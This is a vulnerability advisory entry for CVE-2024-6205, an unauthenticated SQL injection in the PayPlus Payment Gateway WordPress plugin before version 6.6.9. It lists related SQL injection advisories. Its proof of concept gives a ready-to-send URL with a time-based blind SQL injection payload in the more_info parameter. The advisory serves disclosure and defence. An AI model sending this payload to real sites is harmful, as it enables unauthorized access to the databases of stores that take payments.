PayPlus Payment Gateway < 6.6.9 – Unauthenticated SQLi | CVE 2024-6205 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability.

Proof of Concept

- Install and enable WooCommerce
- Install plugin 
- Open incognito browser and send this request: https://test.site/?wc-api=payplus_gateway&status_code=true&more_info=(select*from(select(sleep(2)))a)

Affects Plugins

payplus-payment-gateway

Fixed in 6.6.9

References

CVE

URL

https://projectblack.io/blog/cve-hunting-at-scale/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Project Black

Submitter

Project Black

Submitter website

https://projectblack.io/penetration-testing/

Submitter twitter

Verified

Yes

WPVDB ID

7e2c5032-2917-418c-aee3-092bdb78a087

Timeline

Publicly Published

2024-06-28 (about 1 year ago)

Added

2024-06-28 (about 1 year ago)

Last Updated

2024-06-28 (about 1 year ago)

Other

Published

Title

Published

2025-01-20

Title

Social Share, Social Login and Social Comments Plugin – Super Socializer < 7.14.1 - Unauthenticated Limited SQL Injection via 'SuperSocializerKey'

Published

2023-06-05

Title

FormCraft Premium < 3.9.7 - Admin+ SQLi

Published

2025-11-17

Title

Premmerce Wholesale Pricing for WooCommerce <= 1.1.10 - Authenticated (Subscriber+) SQL Injection

Published

2014-08-01

Title

AdRotate <= 3.9.4 - clicktracker.php track Parameter SQL Injection

Published

2025-04-09

Title

Review Stars Count For WooCommerce <= 2.0 - Authenticated (Subscriber+) SQL Injection